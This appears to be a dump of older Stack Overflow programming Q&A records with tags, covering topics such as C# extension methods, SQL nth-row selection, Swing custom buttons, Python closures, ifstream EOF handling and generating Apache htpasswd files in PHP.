This is a total hack, but you could use an iframe inside the noscript tag to trigger an HTTP GET on a URL that tells the server the user doesn't have JavaScript enabled. ``` <body> ... ... <noscript> <iframe src ="/nojs.aspx?SOMEIDENTIFIER=XXXX&NOJS=TRUE" style="display: none;"> </iframe> </noscript> ... ... </body> ```
How do I know if Javascript has been turned off inside browser?
[ "", "javascript", "browser", "" ]
The new extensions in .Net 3.5 allow functionality to be split out from interfaces. For instance, in .Net 2.0: ``` public interface IHaveChildren { string ParentType { get; } int ParentId { get; } List<IChild> GetChildren(); } ``` Can (in 3.5) become: ``` public interface IHaveChildren { string ParentType { get; } int ParentId { get; } } public static class HaveChildrenExtension { public static List<IChild> GetChildren( this IHaveChildren parent ) { //logic to get children by parent type and id //shared for all classes implementing IHaveChildren } } ``` This seems to me to be a better mechanism for many interfaces. They no longer need an abstract base to share this code, and functionally the code works the same. This could make the code more maintainable and easier to test. The only disadvantage being that an abstract base's implementation can be virtual, but can that be worked around (would an instance method hide an extension method with the same name? would it be confusing code to do so?) Any other reasons not to regularly use this pattern? --- Clarification: Yeah, I see the tendency with extension methods is to end up with them everywhere. I'd be particularly careful having any on .Net value types without a great deal of peer review (I think the only one we have on a string is a `.SplitToDictionary()` - similar to `.Split()` but taking a key-value delimiter too) I think there's a whole best practice debate there ;-) (Incidentally: DannySmurf, your PM sounds scary.) I'm specifically asking here about using extension methods where previously we had interface methods. --- I'm trying to avoid lots of levels of abstract base classes - the classes implementing these models mostly already have base classes. I think this model could be more maintainable and less overly-coupled than adding further object hierarchies. Is this what MS has done to IEnumerable and IQueryable for Linq?
I think the judicious use of extension methods puts interfaces on a more equal footing with (abstract) base classes. **Versioning.** One advantage base classes have over interfaces is that you can easily add new virtual members in a later version, whereas adding members to an interface will break implementers built against the old version of the library. Instead, a new version of the interface with the new members needs to be created, and the library will have to work around or limit access to legacy objects only implementing the original interface. As a concrete example, the first version of a library might define an interface like so: ``` public interface INode { INode Root { get; } List<INode> GetChildren( ); } ``` Once the library has been released, we cannot modify the interface without breaking current users. Instead, in the next release we would need to define a new interface to add additional functionality: ``` public interface IChildNode : INode { INode Parent { get; } } ``` However, only users of the new library will be able to implement the new interface. In order to work with legacy code, we need to adapt the old implementation, which an extension method can handle nicely: ``` public static class NodeExtensions { public static INode GetParent( this INode node ) { // If the node implements the new interface, call it directly. var childNode = node as IChildNode; if( !object.ReferenceEquals( childNode, null ) ) return childNode.Parent; // Otherwise, fall back on a default implementation. return FindParent( node, node.Root ); } } ``` Now all users of the new library can treat both legacy and modern implementations identically. **Overloads.** Another area where extension methods can be useful is in providing overloads for interface methods. You might have a method with several parameters to control its action, of which only the first one or two are important in the 90% case.
Since C# does not allow setting default values for parameters, users either have to call the fully parameterized method every time, or every implementation must implement the trivial overloads for the core method. Instead extension methods can be used to provide the trivial overload implementations: ``` public interface ILongMethod { bool LongMethod( string s, double d, int i, object o, ... ); } ... public static class LongMethodExtensions { public static bool LongMethod( this ILongMethod lm, string s, double d ) { return lm.LongMethod( s, d, 0, null ); } ... } ``` Please note that both of these cases are written in terms of the operations provided by the interfaces, and involve trivial or well-known default implementations. That said, you can only inherit from a class once, and the targeted use of extension methods can provide a valuable way to deal with some of the niceties provided by base classes that interfaces lack :) --- **Edit:** A related post by Joe Duffy: [Extension methods as default interface method implementations](http://joeduffyblog.com/2010/02/09/extension-methods-as-default-interface-method-implementations/)
Extension methods should be used as just that: extensions. Any crucial structure/design related code or non-trivial operation should be put in an object that is composed into/inherited from a class or interface. Once another object tries to use the extended one, it won't see the extensions and might have to reimplement/re-reference them again. The traditional wisdom is that extension methods should only be used for: * utility classes, as Vaibhav mentioned * extending sealed 3rd party APIs
Extension interface patterns
[ "", "c#", ".net-3.5", "extension-methods", "" ]
I can set the PHP include path in the `php.ini`: ``` include_path = /path/to/site/includes/ ``` But then other websites are affected so that is no good. I can set the PHP include in the start of every file: ``` $path = '/path/to/site/includes/'; set_include_path(get_include_path() . PATH_SEPARATOR . $path); ``` But that seems like bad practice and clutters things up. So I can make an include of that and then include it into every file: ``` include 'includes/config.php'; ``` or ``` include '../includes/config.php'; ``` This is what I'm doing right now, but the include path of `config.php` will change depending on what is including it. Is there a better way? Does it matter?
If you're using apache as a webserver you can override (if you allow it) settings using *.htaccess* files. See [the PHP manual](https://www.php.net/configuration.changes) for details. Basically you put a file called *.htaccess* in your website root, which contains some PHP `ini` values. Provided you configured Apache to allow overrides, this site will use all values in your PHP config, + the values you specify in the *.htaccess* file. > Can be used only with `PHP_INI_ALL` and `PHP_INI_PERDIR` type directives as stated in the page I linked. If you click through to the full listing, you see that the include path is a `PHP_INI_ALL` directive.
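For instance, a minimal .htaccess sketch could look like the following (the directory is a placeholder, and `php_value` only takes effect when PHP runs as an Apache module, not under CGI):

```apache
# Prepend a site-specific directory to PHP's include path.
# include_path is a PHP_INI_ALL directive, so it may be set per directory.
php_value include_path ".:/path/to/site/includes"
```

This keeps the setting scoped to one site without touching the global php.ini.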
Erik Van Brakel gave, IMHO, one of the best answers. What's more, if you're using Apache & virtual hosts, you can set the include path directly in them (with `php_admin_value`). Using this method, you won't have to remember to keep the override commands in your .htaccess.
Setting PHP Include Path on a per site basis?
[ "", "php", "include", "" ]
I'm still new to the ASP.NET world, so I could be way off base here, but so far this is to the best of my (limited) knowledge! Let's say I have a standard business object "Contact" in the *Business* namespace. I write a Web Service to retrieve a Contact's info from a database and return it. I then write a client application to request said details. Now, I also then create a utility method that takes a "Contact" and does some magic with it, like `Utils.BuyContactNewHat()` say, which of course takes the Contact of type `Business.Contact`. I then go back to my client application and want to utilise the `BuyContactNewHat` method, so I add a reference to my *Utils* namespace and there it is. However, a problem arises with: ``` Contact c = MyWebService.GetContact("Rob"); Utils.BuyContactNewHat(c); // << Error Here ``` Since the return type of `GetContact` is of `MyWebService.Contact` and not `Business.Contact` as expected. I understand why this is because when accessing a web service, you are actually programming against the proxy class generated by the WSDL. So, is there an "easier" way to deal with this type of mismatch? I was considering perhaps trying to create a generic converter class that uses reflection to ensure two objects have the same structure and then simply transfers the values across from one to the other.
You are on the right track. To get the data from the proxy object back into one of your own objects, you have to do left-hand-right-hand code. i.e. copy property values. I'll bet you that there is already a generic method out there that uses reflection. Some people will use something other than a web service (.net remoting) if they just want to get a business object across the wire. Or they'll use binary serialization. I'm guessing you are using the web service for a reason, so you'll have to do property copying.
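As a language-neutral sketch of that property-copying idea (shown in Python for brevity rather than C#; the class and attribute names are hypothetical stand-ins for the proxy and business types):

```python
def copy_matching_attrs(src, dst):
    """Copy identically named public attributes from src onto dst."""
    for name, value in vars(src).items():
        if not name.startswith("_") and hasattr(dst, name):
            setattr(dst, name, value)
    return dst

# Hypothetical stand-ins for the generated proxy type and the
# hand-written business type with matching property names.
class ProxyContact:
    def __init__(self):
        self.name = "Rob"
        self.hat_size = 7

class BusinessContact:
    def __init__(self):
        self.name = ""
        self.hat_size = 0
```

In C# the same shape would enumerate `Type.GetProperties()` via reflection and copy each readable/writable pair, but the idea is identical: match on name, then transfer values.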
You don't actually have to use the generated class that the WSDL gives you. If you take a look at the code that it generates, it's just making calls into some .NET framework classes to submit SOAP requests. In the past I have copied that code into a normal .cs file and edited it. Although I haven't tried this specifically, I see no reason why you couldn't drop the proxy class definition and use the original class to receive the results of the SOAP call. It must already be doing reflection under the hood; it seems a shame to do it twice.
ASP.NET Web Service Results, Proxy Classes and Type Conversion
[ "", "c#", "asp.net", "web-services", "" ]
I'm interested in learning some (ideally) database agnostic ways of selecting the *n*th row from a database table. It would also be interesting to see how this can be achieved using the native functionality of the following databases: * SQL Server * MySQL * PostgreSQL * SQLite * Oracle I am currently doing something like the following in SQL Server 2005, but I'd be interested in seeing other's more agnostic approaches: ``` WITH Ordered AS ( SELECT ROW_NUMBER() OVER (ORDER BY OrderID) AS RowNumber, OrderID, OrderDate FROM Orders) SELECT * FROM Ordered WHERE RowNumber = 1000000 ``` Credit for the above SQL: [Firoz Ansari's Weblog](https://web.archive.org/web/20101103031717/http://weblogs.asp.net/Firoz/archive/2005/06/12/411949.aspx) **Update:** See [Troels Arvin's answer](https://stackoverflow.com/questions/16568/how-to-select-the-nth-row-in-a-sql-database-table#42765) regarding the SQL standard. *Troels, have you got any links we can cite?*
There are ways of doing this in optional parts of the standard, but a lot of databases support their own way of doing it. A really good site that talks about this and other things is <http://troels.arvin.dk/db/rdbms/#select-limit>. Basically, PostgreSQL and MySQL support the non-standard: ``` SELECT... LIMIT y OFFSET x ``` Oracle, DB2 and MSSQL support the standard windowing functions: ``` SELECT * FROM ( SELECT ROW_NUMBER() OVER (ORDER BY key ASC) AS rownumber, columns FROM tablename ) AS foo WHERE rownumber <= n ``` (which I just copied from the site linked above since I never use those DBs) *Update:* As of PostgreSQL 8.4 the standard windowing functions are supported, so expect the second example to work for PostgreSQL as well. *Update:* SQLite added window function support in version 3.25.0 on 2018-09-15, so both forms also work in SQLite.
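Since SQLite ships with many language runtimes, both forms are easy to sanity-check; for example, with Python's built-in `sqlite3` module (the table and values are invented for the demo, and the window-function form assumes SQLite 3.25 or later):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE orders (order_id INTEGER, order_date TEXT)")
conn.executemany(
    "INSERT INTO orders VALUES (?, ?)",
    [(i, "2008-01-%02d" % i) for i in range(1, 11)],
)

# Non-standard but widely supported: skip n-1 rows, take one.
nth_limit = conn.execute(
    "SELECT order_id FROM orders ORDER BY order_id LIMIT 1 OFFSET 4"
).fetchone()[0]

# Standard windowing form (needs SQLite 3.25+).
nth_window = conn.execute(
    "SELECT order_id FROM ("
    "  SELECT ROW_NUMBER() OVER (ORDER BY order_id) AS rn, order_id"
    "  FROM orders"
    ") WHERE rn = 5"
).fetchone()[0]
```

Both queries select the 5th row; note that without an explicit `ORDER BY` neither form has a well-defined answer.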
PostgreSQL supports [windowing functions](https://www.postgresql.org/docs/current/tutorial-window.html) as defined by the SQL standard, but they're awkward, so most people use (the non-standard) [`LIMIT` / `OFFSET`](http://www.postgresql.org/docs/current/static/queries-limit.html): ``` SELECT * FROM mytable ORDER BY somefield LIMIT 1 OFFSET 20; ``` This example selects the 21st row. `OFFSET 20` is telling Postgres to skip the first 20 records. If you don't specify an `ORDER BY` clause, there's no guarantee which record you will get back, which is rarely useful.
How to select the nth row in a SQL database table?
[ "", "mysql", "sql", "database", "oracle", "postgresql", "" ]
I am using a class library which represents some of its configuration in .xml. The configuration is read in using the `XmlSerializer`. Fortunately, the classes which represent the .xml use the `XmlAnyElement` attribute, which allows me to extend the configuration data for my own purposes without modifying the original class library. ``` <?xml version="1.0" encoding="utf-8"?> <Config> <data>This is some data</data> <MyConfig> <data>This is my data</data> </MyConfig> </Config> ``` This works well for deserialization. I am able to allow the class library to deserialize the .xml as normal and then I can use my own `XmlSerializer` instances with a `XmlNodeReader` against the internal `XmlNode`. ``` public class Config { [XmlElement] public string data; [XmlAnyElement] public XmlNode element; } public class MyConfig { [XmlElement] public string data; } class Program { static void Main(string[] args) { using (Stream fs = new FileStream(@"c:\temp\xmltest.xml", FileMode.Open)) { XmlSerializer xser1 = new XmlSerializer(typeof(Config)); Config config = (Config)xser1.Deserialize(fs); if (config.element != null) { XmlSerializer xser2 = new XmlSerializer(typeof(MyConfig)); MyConfig myConfig = (MyConfig)xser2.Deserialize(new XmlNodeReader(config.element)); } } } } ``` I need to create a utility which will allow the user to generate a new configuration file that includes both the class library configuration as well as my own configuration, so new objects will be created which were not read from the .xml file. The question is how can I serialize the data back into .xml? I realize that I have to initially call `XmlSerializer.Serialize` on my data before calling the same method on the class library configuration. However, this requires that my data is represented by an `XmlNode` after calling `Serialize`. What is the best way to serialize an object into an `XmlNode` using the `XmlSerializer`?
Thanks, -kevin btw-- It looks like an `XmlNodeWriter` class written by Chris Lovett was available at one time from Microsoft, but the links are now broken. Does anyone know of an alternative location to get this class?
So you need to have your class contain custom configuration information, then serialize that class to XML, then make that serialized XML into an XML node: is that right? Could you just take the string created by the XmlSerializer and wrap that in its own XML tags? ``` XmlSerializer xs = new XmlSerializer(typeof(MyConfig)); StringWriter xout = new StringWriter(); xs.Serialize(xout, myConfig); XmlDocument x = new XmlDocument(); x.LoadXml("<myConfig>" + xout.ToString() + "</myConfig>"); ``` Now x is an XmlDocument containing one element, "<myConfig>", which has your serialized custom configuration in it. Is that at all what you're looking for?
It took a bit of work, but the XPathNavigator route does work... just remember to call .Close on the XmlWriter; .Flush() doesn't do anything: ``` //DataContractSerializer serializer = new DataContractSerializer(typeof(foo)); XmlSerializer serializer = new XmlSerializer(typeof(foo)); XmlDocument doc = new XmlDocument(); XPathNavigator nav = doc.CreateNavigator(); XmlWriter writer = nav.AppendChild(); writer.WriteStartDocument(); //serializer.WriteObject(writer, new foo { bar = 42 }); serializer.Serialize(writer, new foo { bar = 42 }); writer.WriteEndDocument(); writer.Flush(); writer.Close(); Console.WriteLine(doc.OuterXml); ```
How do I create an XmlNode from a call to XmlSerializer.Serialize?
[ "", "c#", "xml", "" ]
What is a good way to remove the code from display pages when developing with PHP? Often the pages I work on need to be edited by an outside person. This person is often confused by lots of blocks of PHP, and also likes to break my code. I've tried moving blocks of code out into functions, so now there are functions spread out all throughout the HTML. As some pages become more complex they become programs again, and processing POSTs is questionable. What can I be doing better in my PHP development?
You don't need a "system" to do templating. You can do it on your own by keeping presentation & logic separate. This way the designer can screw up the display, but not the logic behind it. Here's a simple example: ``` <?php $people = array('derek','joel','jeff'); $people[0] = 'martin'; // all your logic goes here include 'templates/people.php'; ?> ``` Now here's the people.php file (which you give your designer): ``` <html> <body> <?php foreach($people as $name):?> <b>Person:</b> <?=$name?> <br /> <?php endforeach;?> </body> </html> ```
Take a look at how some of the popular PHP frameworks use templating. Examples include cakePHP, Zend Framework, and Code Igniter. Even if you are not going to base your site on these frameworks, the template design pattern is a good way to keep php code away from your web designers, so they can focus on layout and not functionality.
PHP best practices?
[ "", "php", "" ]
Is there any way, in any language, to hook my program in when a user renames a file? For example: a user renames a file and presses Enter (or clicks away) to confirm the rename action. BEFORE the file is actually renamed, my program "listens" to this event and pops up a message saying "Are you sure you want to rename C:\test\file.txt to C:\test\test.txt?". I'm thinking/hoping this is possible with C++, C# or .NET, but I don't have any clue where to look.
You can probably solve this by using the [FileSystemWatcher class](http://msdn.microsoft.com/en-us/library/system.io.filesystemwatcher.aspx) in .NET framework. From the class remarks: > You can watch for renaming, deletion, > or creation of files or directories. > For example, to watch for renaming of > text files, set the Filter property to > "\*.txt" and call the WaitForChanged > method with a Renamed specified for > its parameter.
My guess is that this is *not* possible. I did find [this](http://msdn.microsoft.com/en-us/library/bb776794(VS.85).aspx), which is for monitoring operations (including rename) on a folder, but there does not appear to be a similar method for files. @Richard, FileSystemWatcher is good if you only need to monitor changes, but he needs to interrupt them, which it cannot do.
Hooking my program with windows explorer's rename event
[ "", "c#", ".net", "file", "io", "" ]
My current preferred C++ environment is the free and largely excellent Microsoft Visual Studio 2005 Express edition. From time to time I have sent release .exe files to other people with pleasing results. However recently I made the disturbing discovery that the pleasing results were based on more luck than I would like. Attempting to run one of these programs on an old (2001 vintage, not scrupulously updated) XP box gave me nothing but a nasty "System cannot run x.exe" (or similar) message. Some googling revealed that with this toolset, even specifying static linking results in a simple hello-world.exe actually relying on extra .dll files (msvcm80.dll etc.). An incredibly elaborate versioning scheme (manifest files anyone?) then will not let the .exe run without exactly the right .dll versions. I don't want or need this stuff, I just want an old-fashioned self-contained .exe that does nothing but lowest-common-denominator Win32 operations and runs on any old Win32 OS. Does anyone know if it's possible to do what I want to do with my existing toolset? Thank you.
For the C runtime, go to the project settings, choose C/C++, then 'Code Generation'. Change the 'runtime library' setting to 'multithreaded' instead of 'multithreaded dll'. If you are using any other libraries you may need to tell the linker to ignore the dynamically linked CRT explicitly.
My experience in Visual Studio 2010 is that there are two changes needed so as to not need DLL's. From the project property page (right click on the project name in the Solution Explorer window): 1. Under Configuration Properties --> General, change the "Use of MFC" field to "Use MFC in a Static Library". 2. Under Configuration Properties --> C/C++ --> Code Generation, change the "Runtime Library" field to "Multi-Threaded (/MT)" Not sure why both were needed. I used this to remove a dependency on glut32.dll. Added later: When making these changes to the configurations, you should make them to "All Configurations" --- you can select this at the top of the Properties window. If you make the change to just the Debug configuration, it won't apply to the Release configuration, and vice-versa.
How do I make a fully statically linked .exe with Visual Studio Express 2005?
[ "", "c++", "visual-studio", "linker", "" ]
Instead of writing my ASP.NET C# applications in Visual Studio, I use my favorite text editor, UltraEdit32. Is there any way I can implement MVC without the use of VS?
There is nothing VS-specific about the MVC framework - it is just a bunch of DLLs that you can use. The wizards in VS just build you a quick-start framework. ASP.NET MVC is "bin-deployable" - there is nothing too clever to set up on the server either - just point the wildcard ISAPI filter to ASP.NET.
Assuming you have the correct assemblies and a C# compiler, in theory you can use whatever you want to edit the code and then just run the compiler by hand or via a build script. That being said, in my opinion it is a real pain doing .NET development without Visual Studio, SharpDevelop or MonoDevelop.
Developing for ASP.NET-MVC without Visual Studio
[ "", "c#", "asp.net-mvc", "visual-studio", "" ]
Is there a way to create a `JButton` with your own button graphic and not just with an image inside the button? If not, is there another way to create a custom `JButton` in java?
When I was first learning Java we had to make Yahtzee and I thought it would be cool to create custom Swing components and containers instead of just drawing everything on one `JPanel`. The benefit of extending `Swing` components, of course, is to have the ability to add support for keyboard shortcuts and other accessibility features that you can't do just by having a `paint()` method print a pretty picture. It may not be done the best way however, but it may be a good starting point for you. Edit 8/6 - If it wasn't apparent from the images, each Die is a button you can click. This will move it to the `DiceContainer` below. Looking at the source code you can see that each Die button is drawn dynamically, based on its value. ![alt text](https://i.stack.imgur.com/pgyQp.jpg) ![alt text](https://i.stack.imgur.com/jkYRd.jpg) ![alt text](https://i.stack.imgur.com/9BI34.jpg) Here are the basic steps: 1. Create a class that extends `JComponent` 2. Call parent constructor `super()` in your constructors 3. Make sure you class implements `MouseListener` 4. Put this in the constructor: ``` enableInputMethods(true); addMouseListener(this); ``` 5. Override these methods: ``` public Dimension getPreferredSize() public Dimension getMinimumSize() public Dimension getMaximumSize() ``` 6. Override this method: ``` public void paintComponent(Graphics g) ``` The amount of space you have to work with when drawing your button is defined by `getPreferredSize()`, assuming `getMinimumSize()` and `getMaximumSize()` return the same value. I haven't experimented too much with this but, depending on the layout you use for your GUI your button could look completely different. And finally, the [source code](https://github.com/kdeloach/labs/blob/master/java/yahtzee/src/Dice.java). In case I missed anything.
Yes, this is possible. One of the main pros for using Swing is the ease with which abstract controls can be created and manipulated. Here is a quick and dirty way to extend the existing JButton class to draw a circle to the right of the text. ``` package test; import java.awt.Color; import java.awt.Container; import java.awt.Dimension; import java.awt.FlowLayout; import java.awt.Graphics; import javax.swing.JButton; import javax.swing.JFrame; public class MyButton extends JButton { private static final long serialVersionUID = 1L; private Color circleColor = Color.BLACK; public MyButton(String label) { super(label); } @Override protected void paintComponent(Graphics g) { super.paintComponent(g); Dimension originalSize = super.getPreferredSize(); int gap = (int) (originalSize.height * 0.2); int x = originalSize.width + gap; int y = gap; int diameter = originalSize.height - (gap * 2); g.setColor(circleColor); g.fillOval(x, y, diameter, diameter); } @Override public Dimension getPreferredSize() { Dimension size = super.getPreferredSize(); size.width += size.height; return size; } /*Test the button*/ public static void main(String[] args) { MyButton button = new MyButton("Hello, World!"); JFrame frame = new JFrame(); frame.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE); frame.setSize(400, 400); Container contentPane = frame.getContentPane(); contentPane.setLayout(new FlowLayout()); contentPane.add(button); frame.setVisible(true); } } ``` Note that by overriding **paintComponent** the contents of the button can be changed, but that the border is painted by the **paintBorder** method. The **getPreferredSize** method also needs to be managed in order to dynamically support changes to the content. Care needs to be taken when measuring font metrics and image dimensions. For creating a control that you can rely on, the above code is not the correct approach. Dimensions and colours are dynamic in Swing and are dependent on the look and feel being used. 
Even the default *Metal* look has changed across JRE versions. It would be better to implement **AbstractButton** and conform to the guidelines set out by the Swing API. A good starting point is to look at the **javax.swing.LookAndFeel** and **javax.swing.UIManager** classes. <http://docs.oracle.com/javase/8/docs/api/javax/swing/LookAndFeel.html> <http://docs.oracle.com/javase/8/docs/api/javax/swing/UIManager.html> Understanding the anatomy of LookAndFeel is useful for writing controls: [Creating a Custom Look and Feel](http://wayback.archive.org/web/20090309070901/http://java.sun.com/products/jfc/tsc/articles/sce/index.html)
Creating a custom JButton in Java
[ "", "java", "swing", "jbutton", "" ]
The following **C++** code uses a **ifstream** object to read integers from a text file (which has one number per line) until it hits **EOF**. Why does it read the integer on the last line twice? How to fix this? **Code:** ``` #include <iostream> #include <fstream> using namespace std; int main() { ifstream iFile("input.txt"); // input.txt has integers, one per line while (!iFile.eof()) { int x; iFile >> x; cerr << x << endl; } return 0; } ``` **input.txt**: ``` 10 20 30 ``` **Output**: ``` 10 20 30 30 ``` **Note**: I've skipped all error checking code to keep the code snippet small. The above behaviour is seen on Windows (Visual C++), cygwin (gcc) and Linux (gcc).
Just follow closely the chain of events. * Grab 10 * Grab 20 * Grab 30 * Grab EOF Look at the second-to-last iteration. You grabbed 30, then carried on to check for EOF. You haven't reached EOF because the EOF mark hasn't been read yet ("binarically" speaking, its conceptual location is just after the 30 line). Therefore you carry on to the next iteration. x is still 30 from previous iteration. Now you read from the stream and you get EOF. x remains 30 and the ios::eofbit is raised. You output to stderr x (which is 30, just like in the previous iteration). Next you check for EOF in the loop condition, and this time you're out of the loop. Try this: ``` while (true) { int x; iFile >> x; if( iFile.eof() ) break; cerr << x << endl; } ``` By the way, there is another bug in your code. Did you ever try to run it on an empty file? The behaviour you get is for the exact same reason.
I like this example, which for now leaves out the error check you could add inside the while block: ``` ifstream iFile("input.txt"); // input.txt has integers, one per line int x; while (iFile >> x) { cerr << x << endl; } ``` Not sure how safe it is...
Reading from text file until EOF repeats last line
[ "", "c++", "iostream", "fstream", "" ]
I am getting C++ Compiler error C2371 when I include a header file that itself includes odbcss.h. My project is set to MBCS. > C:\Program Files\Microsoft SDKs\Windows\v6.0A\include\odbcss.h(430) : > error C2371: 'WCHAR' : redefinition; different basic types 1> > C:\Program Files\Microsoft SDKs\Windows\v6.0A\include\winnt.h(289) : > see declaration of 'WCHAR' I don't see any defines in odbcss.h that I could set to avoid this. Has anyone else seen this?
This is a known bug - see the Microsoft Connect website: <http://connect.microsoft.com/VisualStudio/feedback/ViewFeedback.aspx?FeedbackID=98699> The error doesn't occur if you compile your app as Unicode instead of MBCS.
There are a half-dozen posts on various forums around the web about this - it seems to potentially be an issue when odbcss.h is used in the presence of MFC. Most of the answers involve changing the order of included headers (voodoo debugging). The header that includes odbcss.h compiles fine in its native project, but when it is included in a different project, it gives this error. We even put it in the latter project's stdafx.h, right after the base include for MFC, and still no joy. We finally worked around it by moving it into a cpp file in the original project, which does not use MFC (which should have been done anyway - but it wasn't our code). So we've got a work-around, but no real solution.
C++ Compiler Error C2371 - Redefinition of WCHAR
[ "", "c++", "visual-studio", "" ]
I'm in the process of weeding out all hardcoded values in a Java library and was wondering what framework would be the best (in terms of zero- or close-to-zero configuration) to handle run-time configuration? I would prefer XML-based configuration files, but it's not essential. Please do only reply if you have practical experience with a framework. I'm not looking for examples, but experience...
If your hardcoded values are just simple key-value pairs, you should look at [java.util.Properties](http://java.sun.com/j2se/1.5.0/docs/api/java/util/Properties.html). It's a lot simpler than xml, easier to use, and mind-numbingly trivial to implement. If you are working with Java and the data you are storing or retrieving from disk is modeled as a key value pair (which it sounds like it is in your case), then I really can't imagine a better solution. I have used properties files for simple configuration of small packages in a bigger project, and as a more global configuration for a whole project, and I have never had problems with it. Of course this has the huge benefit of not requiring any 3rd party libraries to utilize.
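To show how little code the `java.util.Properties` route takes, here is a minimal sketch. The keys and values are invented for illustration; with a real config file you would pass a `FileInputStream` (or `FileReader`) to `load()` instead of the in-memory `StringReader` used here:

```java
import java.io.StringReader;
import java.util.Properties;

public class ConfigDemo {
    public static void main(String[] args) throws Exception {
        // Stand-in for the contents of a config.properties file on disk
        String fileContents = "db.host=localhost\ndb.port=5432\n";

        Properties config = new Properties();
        config.load(new StringReader(fileContents));

        System.out.println(config.getProperty("db.host"));
        // getProperty takes an optional default for missing keys
        System.out.println(config.getProperty("db.timeout", "30"));
    }
}
```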
[Apache Commons Configuration](http://commons.apache.org/configuration/) works great. It supports having the configuration stored in a wide range of formats on the backend including properties, XML, JNDI, and more. It is easy to use and to extend. To get the most flexibility out of it use a [factory](http://en.wikipedia.org/wiki/Factory_method_pattern) to get the configuration and just use the [Configuration interface](http://commons.apache.org/configuration/apidocs/org/apache/commons/configuration/Configuration.html) after that. Two feature of Commons Configuration that differentiate it over a straight Properties file is that it support automatic conversion to common types (int, float, String arrays) and it supports property substitution: ``` server.host=myHost server.url=http://${server.host}/somePath ```
Java configuration framework
[ "", "java", "xml", "configuration", "frameworks", "configurationmanager", "" ]
I've been reading a lot about closures and I think I understand them, but without clouding the picture for myself and others, I am hoping someone can explain closures as succinctly and clearly as possible. I'm looking for a simple explanation that might help me understand where and why I would want to use them.
[Closure on closures](http://mrevelle.blogspot.com/2006/10/closure-on-closures.html) > Objects are data with methods > attached, closures are functions with > data attached. ``` def make_counter(): i = 0 def counter(): # counter() is a closure nonlocal i i += 1 return i return counter c1 = make_counter() c2 = make_counter() print (c1(), c1(), c2(), c2()) # -> 1 2 1 2 ```
It's simple: A function that references variables from a containing scope, potentially after flow-of-control has left that scope. That last bit is very useful: ``` >>> def makeConstantAdder(x): ... constant = x ... def adder(y): ... return y + constant ... return adder ... >>> f = makeConstantAdder(12) >>> f(3) 15 >>> g = makeConstantAdder(4) >>> g(3) 7 ``` Note that 12 and 4 have "disappeared" inside f and g, respectively; this feature is what makes f and g proper closures.
Can you explain closures (as they relate to Python)?
[ "", "python", "functional-programming", "closures", "" ]
.NET Framework: 2.0 Preferred Language: C# I am new to TDD (Test Driven Development). First of all, is it even possible to unit test Windows Service? Windows service class is derived from ServiceBase, which has overridable methods, 1. OnStart 2. OnStop How can I trigger those methods to be called as if unit test is an actual service that calls those methods in proper order? At this point, am I even doing a Unit testing? or an Integration test? I have looked at WCF service question but it didn't make any sense to me since I have never dealt with WCF service.
I'd probably recommend designing your app so the "OnStart" and "OnStop" overrides in the Windows Service just call methods on a class library assembly. That way you can automate unit tests against the class library methods, and the design also abstracts your business logic from the implementation of a Windows Service. In this scenario, testing the "OnStart" and "OnStop" methods themselves in a Windows Service context would then be an integration test, not something you would automate.
I have unit tested windows services by not testing the service directly, but rather testing what the service does. Typically I create one assembly for the service and another for what the service does. Then I write unit tests against the second assembly. The nice thing about this approach is that your service is very thin. Basically all it does is call methods to do the right work at the right time. Your other assembly contains all the meat of the work your service intends to do. This makes it very easy to test and easy to reuse or modify as needed.
How can I unit test a Windows Service?
[ "", "c#", ".net", "unit-testing", "windows-services", "" ]
I would like to be able to use the `Tab` key within a text box to tab over four spaces. The way it is now, the Tab key jumps my cursor to the next input. Is there some JavaScript that will capture the Tab key in the text box before it bubbles up to the UI? I understand some browsers (i.e. FireFox) may not allow this. How about a custom key-combo like `Shift`+`Tab`, or `Ctrl`+`Q`?
Even if you capture the `keydown`/`keyup` event (those are the only events that the tab key fires), you still need some way to prevent the default action, moving to the next item in the tab order, from occurring. In Firefox you can call the `preventDefault()` method on the event object passed to your event handler. In IE, you have to return false from the event handler. The jQuery library provides a `preventDefault` method on its event object that works in IE and FF. ``` <body> <input type="text" id="myInput"> <script type="text/javascript"> var myInput = document.getElementById("myInput"); if(myInput.addEventListener ) { myInput.addEventListener('keydown',this.keyHandler,false); } else if(myInput.attachEvent ) { myInput.attachEvent('onkeydown',this.keyHandler); /* damn IE hack */ } function keyHandler(e) { var TABKEY = 9; if(e.keyCode == TABKEY) { this.value += "    "; if(e.preventDefault) { e.preventDefault(); } return false; } } </script> </body> ```
I'd rather tab indentation not work than breaking tabbing between form items. If you want to indent to put in code in the Markdown box, use `Ctrl`+`K` (or ⌘K on a Mac). In terms of actually stopping the action, jQuery (which Stack Overflow uses) will stop an event from bubbling when you return false from an event callback. This makes life easier for working with multiple browsers.
Capturing TAB key in text box
[ "", "javascript", "user-interface", "" ]
I know that we can get the MAC address of a user via IE (ActiveX objects). Is there a way to obtain a user's MAC address using JavaScript?
I concur with all the previous answers that it would be a privacy/security vulnerability if you would be able to do this directly from Javascript. There are two things I can think of: * Using Java (with a signed applet) * Using signed Javascript, which in FF (and Mozilla in general) gets higher privileges than normal JS (but it is fairly complicated to set up)
The quick and simple answer is No. Javascript is quite a high level language and does not have access to this sort of information.
MAC addresses in JavaScript
[ "", "javascript", "mac-address", "" ]
Is there a programmatic way to build *htpasswd* files, without depending on OS specific functions (i.e. `exec()`, `passthru()`)?
.htpasswd files are just text files with a specific format depending on the hash function specified. If you are using MD5 they look like this: ``` foo:$apr1$y1cXxW5l$3vapv2yyCXaYz8zGoXj241 ``` That's the login, a colon, `$apr1$`, the salt, and the MD5 hash (iterated 1000 times by Apache's apr1 scheme) encoded as base64. If you select SHA1 they look like this: ``` foo:{SHA}BW6v589SIg3i3zaEW47RcMZ+I+M= ``` That's the login, a colon, the string {SHA} and the SHA1 hash encoded with base64. If your language has an implementation of either MD5 or SHA1 and base64 you can just create the file like this: ``` <?php $login = 'foo'; $pass = 'pass'; $hash = base64_encode(sha1($pass, true)); $contents = $login . ':{SHA}' . $hash; file_put_contents('.htpasswd', $contents); ?> ``` Here's more information on the format: <http://httpd.apache.org/docs/2.2/misc/password_encryptions.html>
